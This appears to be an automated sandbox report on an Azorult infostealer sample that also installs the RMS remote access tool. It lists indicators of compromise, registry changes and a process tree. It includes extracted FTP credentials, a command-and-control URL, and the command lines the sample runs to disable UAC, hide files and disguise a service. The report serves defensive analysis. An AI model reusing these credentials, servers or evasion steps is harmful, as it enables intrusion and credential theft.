azorult | a2d3d6430f6775951cf988d960cfae4093d7a1e4d0f684ddfffaf4599ace9a71

Resubmissions

18-11-2020 14:18

201118-dj27sn3f52 10

18-11-2020 13:42

201118-1arz86e7w6 10

18-11-2020 13:38

201118-n8jh228ctn 10

Analysis

max time kernel
62s
max time network
73s
platform
windows10_x64
resource
win10v20201028
submitted
18-11-2020 13:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

LtHv0O2KZDK4M637.bin.exe

Score

10^/10

azorult rms aspackv2 discovery evasion infostealer persistence rat spyware stealer trojan upx

Malware Config

Extracted

Credentials

Protocol: ftp
Host:
109.248.203.81
Port:
21
Username:
alex
Password:
easypassword

Extracted

Family

azorult

http://195.245.112.115/index.php

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Modifies visiblity of hidden/system files in Explorer 2 TTPs
evasion

Hidden Files and Directories
T1158

Modify Registry
T1112
RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112
Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112

ACProtect 1.3x - 1.4x DLL software 2 IoCs

Detects file using ACProtect software.

Processes:

resource	yara_rule
C:\ProgramData\Windows\vp8decoder.dll	acprotect
C:\ProgramData\Windows\vp8encoder.dll	acprotect

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

ASPack v2.12-2.42 9 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\ProgramData\Windows\rutserv.exe	aspack_v212_v242
C:\ProgramData\Windows\rutserv.exe	aspack_v212_v242
C:\ProgramData\Windows\rutserv.exe	aspack_v212_v242
C:\ProgramData\Windows\rutserv.exe	aspack_v212_v242
C:\ProgramData\Windows\rutserv.exe	aspack_v212_v242
C:\ProgramData\Windows\rfusclient.exe	aspack_v212_v242
C:\ProgramData\Windows\rfusclient.exe	aspack_v212_v242
C:\ProgramData\Windows\rfusclient.exe	aspack_v212_v242
C:\ProgramData\Windows\rfusclient.exe	aspack_v212_v242

Blocks application from running via registry modification
Adds application to list of disallowed applications.
evasion

Drops file in Drivers directory 3 IoCs

Processes:

taskhost.exeLtHv0O2KZDK4M637.bin.exe

description	ioc	process
File created	C:\Windows\SysWOW64\drivers\conhost.exe	taskhost.exe
File opened for modification	C:\Windows\SysWOW64\drivers\conhost.exe	taskhost.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	LtHv0O2KZDK4M637.bin.exe

Executes dropped EXE 18 IoCs

Processes:

wini.exewinit.exerutserv.exerutserv.exerutserv.exerutserv.exesys.exerfusclient.exerfusclient.exerfusclient.execheat.exetaskhost.exetaskhostw.exewinlogon.exeR8.exeRar.exeRDPWInst.exeRDPWInst.exe

pid	process
2768	wini.exe
2696	winit.exe
2164	rutserv.exe
1992	rutserv.exe
2236	rutserv.exe
3444	rutserv.exe
1468	sys.exe
2412	rfusclient.exe
2388	rfusclient.exe
2432	rfusclient.exe
3744	cheat.exe
664	taskhost.exe
1584	taskhostw.exe
2736	winlogon.exe
668	R8.exe
4176	Rar.exe
4680	RDPWInst.exe
4404	RDPWInst.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\ProgramData\Windows\vp8decoder.dll	upx
C:\ProgramData\Windows\vp8encoder.dll	upx
C:\ProgramData\WindowsTask\winlogon.exe	upx
C:\Programdata\WindowsTask\winlogon.exe	upx

Loads dropped DLL 5 IoCs

Processes:

sys.exesvchost.exe

pid process

1468 sys.exe
1468 sys.exe
1468 sys.exe
1468 sys.exe
8 svchost.exe

pid	process
1468	sys.exe
1468	sys.exe
1468	sys.exe
1468	sys.exe
8	svchost.exe

Modifies file permissions 1 TTPs 14 IoCs

discovery

File Permissions Modification

T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	process
4564	icacls.exe
1428	icacls.exe
5040	icacls.exe
4684	icacls.exe
4848	icacls.exe
912	icacls.exe
4604	icacls.exe
4620	icacls.exe
4120	icacls.exe
4996	icacls.exe
1716	icacls.exe
732	icacls.exe
4504	icacls.exe
1788	icacls.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

taskhostw.exeLtHv0O2KZDK4M637.bin.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"	taskhostw.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	LtHv0O2KZDK4M637.bin.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"	LtHv0O2KZDK4M637.bin.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	taskhostw.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

LtHv0O2KZDK4M637.bin.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	LtHv0O2KZDK4M637.bin.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

8 ip-api.com

flow	ioc
8	ip-api.com

Modifies WinLogon 2 TTPs 7 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

LtHv0O2KZDK4M637.bin.exeRDPWInst.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	LtHv0O2KZDK4M637.bin.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	LtHv0O2KZDK4M637.bin.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	LtHv0O2KZDK4M637.bin.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	LtHv0O2KZDK4M637.bin.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	LtHv0O2KZDK4M637.bin.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	LtHv0O2KZDK4M637.bin.exe

Drops file in Program Files directory 8 IoCs

Processes:

attrib.exeattrib.exetaskhost.exeRDPWInst.exe

description	ioc	process
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.dll	attrib.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	attrib.exe
File opened for modification	C:\Program Files\RDP Wrapper	attrib.exe
File opened for modification	C:\Program Files (x86)\Microsoft JDX	taskhost.exe
File opened for modification	C:\Program Files (x86)\Zaxar	taskhost.exe
File created	C:\Program Files\Common Files\System\iediagcmd.exe	taskhost.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe

Drops file in Windows directory 5 IoCs

Processes:

taskhost.exe

description	ioc	process
File created	C:\Windows\boy.exe	taskhost.exe
File opened for modification	C:\Windows\boy.exe	taskhost.exe
File created	C:\Windows\svchost.exe	taskhost.exe
File opened for modification	C:\Windows\svchost.exe	taskhost.exe
File opened for modification	C:\Windows\NetworkDistribution	taskhost.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

sys.exewinit.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	sys.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	sys.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	winit.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	winit.exe

Delays execution with timeout.exe 6 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

3908 timeout.exe
312 timeout.exe
1620 timeout.exe
2080 timeout.exe
4272 timeout.exe
4864 timeout.exe
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

ipconfig.exe

pid process

4600 ipconfig.exe
Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

216 taskkill.exe
1604 taskkill.exe
4240 taskkill.exe

pid	process
3908	timeout.exe
312	timeout.exe
1620	timeout.exe
2080	timeout.exe
4272	timeout.exe
4864	timeout.exe

pid	process
4600	ipconfig.exe

pid	process
216	taskkill.exe
1604	taskkill.exe
4240	taskkill.exe

Modifies registry class 6 IoCs

Processes:

winit.exeR8.execmd.exewini.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset	winit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage	winit.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings	R8.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings	wini.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\MIME\Database	winit.exe

NTFS ADS 2 IoCs

Processes:

taskhostw.exeLtHv0O2KZDK4M637.bin.exe

description	ioc	process
File opened for modification	C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2	taskhostw.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\WinMgmts:\	LtHv0O2KZDK4M637.bin.exe

Runs .reg file with regedit 2 IoCs

Processes:

regedit.exeregedit.exe

pid process

2988 regedit.exe
3904 regedit.exe
Runs net.exe

pid	process
2988	regedit.exe
3904	regedit.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

LtHv0O2KZDK4M637.bin.exerutserv.exerutserv.exerutserv.exe

pid	process
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
2164	rutserv.exe
2164	rutserv.exe
2164	rutserv.exe
2164	rutserv.exe
2164	rutserv.exe
2164	rutserv.exe
1992	rutserv.exe
1992	rutserv.exe
2236	rutserv.exe
2236	rutserv.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

taskhostw.exe

pid process

1584 taskhostw.exe
Suspicious behavior: LoadsDriver 3 IoCs

Processes:

pid process

636
636
636
Suspicious behavior: SetClipboardViewer 1 IoCs

Processes:

rfusclient.exe

pid process

2432 rfusclient.exe

pid	process
1584	taskhostw.exe

pid	process
636
636
636

pid	process
2432	rfusclient.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

rutserv.exerutserv.exerutserv.exeLtHv0O2KZDK4M637.bin.exe

description	pid	process
Token: SeDebugPrivilege	2164	rutserv.exe
Token: SeDebugPrivilege	2236	rutserv.exe
Token: SeTakeOwnershipPrivilege	3444	rutserv.exe
Token: SeTcbPrivilege	3444	rutserv.exe
Token: SeTcbPrivilege	3444	rutserv.exe
Token: SeDebugPrivilege	984	LtHv0O2KZDK4M637.bin.exe
Token: 9800749783901672131	984	LtHv0O2KZDK4M637.bin.exe
Token: 0	984	LtHv0O2KZDK4M637.bin.exe
Token: 274877907072	984	LtHv0O2KZDK4M637.bin.exe
Token: 0	984	LtHv0O2KZDK4M637.bin.exe
Token: 17614262791034696090	984	LtHv0O2KZDK4M637.bin.exe
Token: SeCreateTokenPrivilege	984	LtHv0O2KZDK4M637.bin.exe
Token: 220676626295829165	984	LtHv0O2KZDK4M637.bin.exe
Token: 4294967302	984	LtHv0O2KZDK4M637.bin.exe
Token: 2954879187564134559	984	LtHv0O2KZDK4M637.bin.exe
Token: 9920249032596265192	984	LtHv0O2KZDK4M637.bin.exe
Token: SeTakeOwnershipPrivilege	984	LtHv0O2KZDK4M637.bin.exe
Token: 9223374061664402713	984	LtHv0O2KZDK4M637.bin.exe
Token: 8589934609	984	LtHv0O2KZDK4M637.bin.exe
Token: 8589934609	984	LtHv0O2KZDK4M637.bin.exe
Token: 10641221009908170752	984	LtHv0O2KZDK4M637.bin.exe
Token: 281477286448623	984	LtHv0O2KZDK4M637.bin.exe
Token: 30399589615342016	984	LtHv0O2KZDK4M637.bin.exe
Token: 1080863910568919553	984	LtHv0O2KZDK4M637.bin.exe
Token: 1080863910568919553	984	LtHv0O2KZDK4M637.bin.exe
Token: 1080863910568919553	984	LtHv0O2KZDK4M637.bin.exe
Token: 37155092135616248	984	LtHv0O2KZDK4M637.bin.exe
Token: 0	984	LtHv0O2KZDK4M637.bin.exe
Token: 6293669620	984	LtHv0O2KZDK4M637.bin.exe
Token: 21710510635	984	LtHv0O2KZDK4M637.bin.exe
Token: 10527315420	984	LtHv0O2KZDK4M637.bin.exe
Token: 51539607552	984	LtHv0O2KZDK4M637.bin.exe
Token: 6937813002834471071	984	LtHv0O2KZDK4M637.bin.exe
Token: 0	984	LtHv0O2KZDK4M637.bin.exe
Token: 579867377021645078	984	LtHv0O2KZDK4M637.bin.exe
Token: 0	984	LtHv0O2KZDK4M637.bin.exe
Token: 1374389534720	984	LtHv0O2KZDK4M637.bin.exe
Token: 0	984	LtHv0O2KZDK4M637.bin.exe
Token: 580148851998355734	984	LtHv0O2KZDK4M637.bin.exe
Token: 0	984	LtHv0O2KZDK4M637.bin.exe
Token: 1374389534720	984	LtHv0O2KZDK4M637.bin.exe
Token: 580148797807948212	984	LtHv0O2KZDK4M637.bin.exe
Token: 0	984	LtHv0O2KZDK4M637.bin.exe
Token: 188978561024	984	LtHv0O2KZDK4M637.bin.exe
Token: 580148849330778551	984	LtHv0O2KZDK4M637.bin.exe
Token: 8320987296359586348	984	LtHv0O2KZDK4M637.bin.exe
Token: 10527315420	984	LtHv0O2KZDK4M637.bin.exe
Token: 343597383681	984	LtHv0O2KZDK4M637.bin.exe
Token: 43029094230	984	LtHv0O2KZDK4M637.bin.exe
Token: 341863557001808664	984	LtHv0O2KZDK4M637.bin.exe
Token: 9799851482751478265	984	LtHv0O2KZDK4M637.bin.exe
Token: 13303070993073847246	984	LtHv0O2KZDK4M637.bin.exe
Token: 51539607552	984	LtHv0O2KZDK4M637.bin.exe
Token: 0	984	LtHv0O2KZDK4M637.bin.exe
Token: 52514940786	984	LtHv0O2KZDK4M637.bin.exe
Token: 1080863910568919553	984	LtHv0O2KZDK4M637.bin.exe
Token: 341689696674966296	984	LtHv0O2KZDK4M637.bin.exe
Token: 1080863910568919553	984	LtHv0O2KZDK4M637.bin.exe
Token: 79494248	984	LtHv0O2KZDK4M637.bin.exe
Token: 6937813002834471071	984	LtHv0O2KZDK4M637.bin.exe
Token: 6937813002834471071	984	LtHv0O2KZDK4M637.bin.exe
Token: 6937813002834471071	984	LtHv0O2KZDK4M637.bin.exe
Token: 70371053915631	984	LtHv0O2KZDK4M637.bin.exe
Token: 98784247812	984	LtHv0O2KZDK4M637.bin.exe

Suspicious use of SetWindowsHookEx 11 IoCs

Processes:

winit.exerutserv.exerutserv.exerutserv.exerutserv.exeWinMail.exeWinMail.exetaskhost.exetaskhostw.exewinlogon.exeR8.exe

pid	process
2696	winit.exe
2164	rutserv.exe
1992	rutserv.exe
2236	rutserv.exe
3444	rutserv.exe
508	WinMail.exe
1348	WinMail.exe
664	taskhost.exe
1584	taskhostw.exe
2736	winlogon.exe
668	R8.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

LtHv0O2KZDK4M637.bin.exewini.exeWScript.execmd.exerutserv.exewinit.exeWinMail.exerfusclient.exe

description	pid	process	target process
PID 984 wrote to memory of 2768	984	LtHv0O2KZDK4M637.bin.exe	wini.exe
PID 984 wrote to memory of 2768	984	LtHv0O2KZDK4M637.bin.exe	wini.exe
PID 984 wrote to memory of 2768	984	LtHv0O2KZDK4M637.bin.exe	wini.exe
PID 2768 wrote to memory of 188	2768	wini.exe	WScript.exe
PID 2768 wrote to memory of 188	2768	wini.exe	WScript.exe
PID 2768 wrote to memory of 188	2768	wini.exe	WScript.exe
PID 188 wrote to memory of 3284	188	WScript.exe	cmd.exe
PID 188 wrote to memory of 3284	188	WScript.exe	cmd.exe
PID 188 wrote to memory of 3284	188	WScript.exe	cmd.exe
PID 2768 wrote to memory of 2696	2768	wini.exe	winit.exe
PID 2768 wrote to memory of 2696	2768	wini.exe	winit.exe
PID 2768 wrote to memory of 2696	2768	wini.exe	winit.exe
PID 3284 wrote to memory of 2988	3284	cmd.exe	regedit.exe
PID 3284 wrote to memory of 2988	3284	cmd.exe	regedit.exe
PID 3284 wrote to memory of 2988	3284	cmd.exe	regedit.exe
PID 3284 wrote to memory of 3904	3284	cmd.exe	regedit.exe
PID 3284 wrote to memory of 3904	3284	cmd.exe	regedit.exe
PID 3284 wrote to memory of 3904	3284	cmd.exe	regedit.exe
PID 3284 wrote to memory of 3908	3284	cmd.exe	timeout.exe
PID 3284 wrote to memory of 3908	3284	cmd.exe	timeout.exe
PID 3284 wrote to memory of 3908	3284	cmd.exe	timeout.exe
PID 3284 wrote to memory of 2164	3284	cmd.exe	rutserv.exe
PID 3284 wrote to memory of 2164	3284	cmd.exe	rutserv.exe
PID 3284 wrote to memory of 2164	3284	cmd.exe	rutserv.exe
PID 3284 wrote to memory of 1992	3284	cmd.exe	rutserv.exe
PID 3284 wrote to memory of 1992	3284	cmd.exe	rutserv.exe
PID 3284 wrote to memory of 1992	3284	cmd.exe	rutserv.exe
PID 3284 wrote to memory of 2236	3284	cmd.exe	rutserv.exe
PID 3284 wrote to memory of 2236	3284	cmd.exe	rutserv.exe
PID 3284 wrote to memory of 2236	3284	cmd.exe	rutserv.exe
PID 984 wrote to memory of 1468	984	LtHv0O2KZDK4M637.bin.exe	sys.exe
PID 984 wrote to memory of 1468	984	LtHv0O2KZDK4M637.bin.exe	sys.exe
PID 984 wrote to memory of 1468	984	LtHv0O2KZDK4M637.bin.exe	sys.exe
PID 3444 wrote to memory of 2412	3444	rutserv.exe	rfusclient.exe
PID 3444 wrote to memory of 2412	3444	rutserv.exe	rfusclient.exe
PID 3444 wrote to memory of 2412	3444	rutserv.exe	rfusclient.exe
PID 3444 wrote to memory of 2388	3444	rutserv.exe	rfusclient.exe
PID 3444 wrote to memory of 2388	3444	rutserv.exe	rfusclient.exe
PID 3444 wrote to memory of 2388	3444	rutserv.exe	rfusclient.exe
PID 3284 wrote to memory of 2180	3284	cmd.exe	attrib.exe
PID 3284 wrote to memory of 2180	3284	cmd.exe	attrib.exe
PID 3284 wrote to memory of 2180	3284	cmd.exe	attrib.exe
PID 3284 wrote to memory of 3108	3284	cmd.exe	attrib.exe
PID 3284 wrote to memory of 3108	3284	cmd.exe	attrib.exe
PID 3284 wrote to memory of 3108	3284	cmd.exe	attrib.exe
PID 3284 wrote to memory of 224	3284	cmd.exe	sc.exe
PID 3284 wrote to memory of 224	3284	cmd.exe	sc.exe
PID 3284 wrote to memory of 224	3284	cmd.exe	sc.exe
PID 3284 wrote to memory of 828	3284	cmd.exe	sc.exe
PID 3284 wrote to memory of 828	3284	cmd.exe	sc.exe
PID 3284 wrote to memory of 828	3284	cmd.exe	sc.exe
PID 3284 wrote to memory of 3580	3284	cmd.exe	sc.exe
PID 3284 wrote to memory of 3580	3284	cmd.exe	sc.exe
PID 3284 wrote to memory of 3580	3284	cmd.exe	sc.exe
PID 2696 wrote to memory of 508	2696	winit.exe	WinMail.exe
PID 2696 wrote to memory of 508	2696	winit.exe	WinMail.exe
PID 2696 wrote to memory of 508	2696	winit.exe	WinMail.exe
PID 508 wrote to memory of 1348	508	WinMail.exe	WinMail.exe
PID 508 wrote to memory of 1348	508	WinMail.exe	WinMail.exe
PID 2388 wrote to memory of 2432	2388	rfusclient.exe	rfusclient.exe
PID 2388 wrote to memory of 2432	2388	rfusclient.exe	rfusclient.exe
PID 2388 wrote to memory of 2432	2388	rfusclient.exe	rfusclient.exe
PID 2696 wrote to memory of 2244	2696	winit.exe	cmd.exe
PID 2696 wrote to memory of 2244	2696	winit.exe	cmd.exe

System policy modification 1 TTPs 3 IoCs

evasion

Modify Registry

T1112

Processes:

LtHv0O2KZDK4M637.bin.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	LtHv0O2KZDK4M637.bin.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	LtHv0O2KZDK4M637.bin.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	LtHv0O2KZDK4M637.bin.exe

Views/modifies file attributes 1 TTPs 5 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid process

2416 attrib.exe
5084 attrib.exe
2180 attrib.exe
3108 attrib.exe
4840 attrib.exe

pid	process
2416	attrib.exe
5084	attrib.exe
2180	attrib.exe
3108	attrib.exe
4840	attrib.exe

C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.bin.exe
"C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.bin.exe"
1⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Checks whether UAC is enabled
- Modifies WinLogon
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:984

C:\ProgramData\Microsoft\Intel\wini.exe
C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2768

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
3⤵
- Suspicious use of WriteProcessMemory
PID:188

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:3284

C:\Windows\SysWOW64\regedit.exe
regedit /s "reg1.reg"
5⤵
- Runs .reg file with regedit
PID:2988

C:\Windows\SysWOW64\regedit.exe
regedit /s "reg2.reg"
5⤵
- Runs .reg file with regedit
PID:3904

C:\Windows\SysWOW64\timeout.exe
timeout 2
5⤵
- Delays execution with timeout.exe
PID:3908

C:\ProgramData\Windows\rutserv.exe
rutserv.exe /silentinstall
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2164

C:\ProgramData\Windows\rutserv.exe
rutserv.exe /firewall
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1992

C:\ProgramData\Windows\rutserv.exe
rutserv.exe /start
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2236

C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows\*.*
5⤵
- Views/modifies file attributes
PID:2180

C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows
5⤵
- Views/modifies file attributes
PID:3108

C:\Windows\SysWOW64\sc.exe
sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
5⤵
PID:224

C:\Windows\SysWOW64\sc.exe
sc config RManService obj= LocalSystem type= interact type= own
5⤵
PID:828

C:\Windows\SysWOW64\sc.exe
sc config RManService DisplayName= "Microsoft Framework"
5⤵
PID:3580

C:\ProgramData\Windows\winit.exe
"C:\ProgramData\Windows\winit.exe"
3⤵
- Executes dropped EXE
- Checks processor information in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2696

C:\Program Files (x86)\Windows Mail\WinMail.exe
"C:\Program Files (x86)\Windows Mail\WinMail" OCInstallUserConfigOE
4⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:508

C:\Program Files\Windows Mail\WinMail.exe
"C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
5⤵
- Suspicious use of SetWindowsHookEx
PID:1348

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
4⤵
PID:2244

